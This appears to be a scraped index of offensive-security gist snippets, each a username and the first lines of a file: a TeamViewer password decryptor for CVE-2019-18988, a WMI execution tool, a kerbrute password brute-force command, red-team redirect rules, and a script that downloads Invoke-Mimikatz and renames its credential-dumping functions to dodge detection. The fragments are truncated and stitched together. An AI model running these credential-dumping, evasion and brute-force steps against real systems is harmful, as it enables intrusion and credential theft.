readmeexe

#!/usr/bin/env python3
# Decrypt Teamviewer Passwords from exported registry file
# Usage: python tvd.py Teamviewer_Settings.reg
# Modified by readmeexe
#
# CVE-2019-18988
# Original Author @whynotsecurity
# https://whynotsecurity.com/blog/teamviewer/

import sys, hexdump, binascii

nullbind

# ---------------------------------------------------
# Load the Active Directory PowerShell module
# ---------------------------------------------------
# $ADModuleBytes = [System.IO.File]::ReadAllBytes("C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.ActiveDirectory.Management.dll")
# $ADModuleString = [System.Convert]::ToBase64String($ADModuleBytes)

# Set the string

knavesec

#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

mainframed

#!/bin/bash

# Nmap can crash when scanning large ranges
# To use this script, start your scan with whatever 
# nmap options you want making sure you use -oA <filename>
# or -oG <filename> (you need the gnmap file) then cancel
# the scan. replace <filename> below and run this script.
# It will also record when it failed to a file called failed.txt

until nmap --resume <filename>.gnmap

curi0usJack

	# 
	# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	# 
	# Include /etc/apache2/redirect.rules
	#

curi0usJack

# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API
# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV
# 
# Author: @curi0usJack
#
# Dependencies:
#   Tweepy: sudo pip install tweepy
#   Twitter API access. Set up here: https://apps.twitter.com/

import tweepy

curi0usJack

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;

sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1

HarmJ0y

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

leftp

#DISCLAIMER
#I'm not the original author of the script... 
#Original git repo vanished

function String-to-ByteArray ($String)
{
	$ByteArray=@()
	For ( $i = 0; $i -lt ($String.Length/2); $i++ ) 
	{
		$Chars=$String.Substring($i*2,2)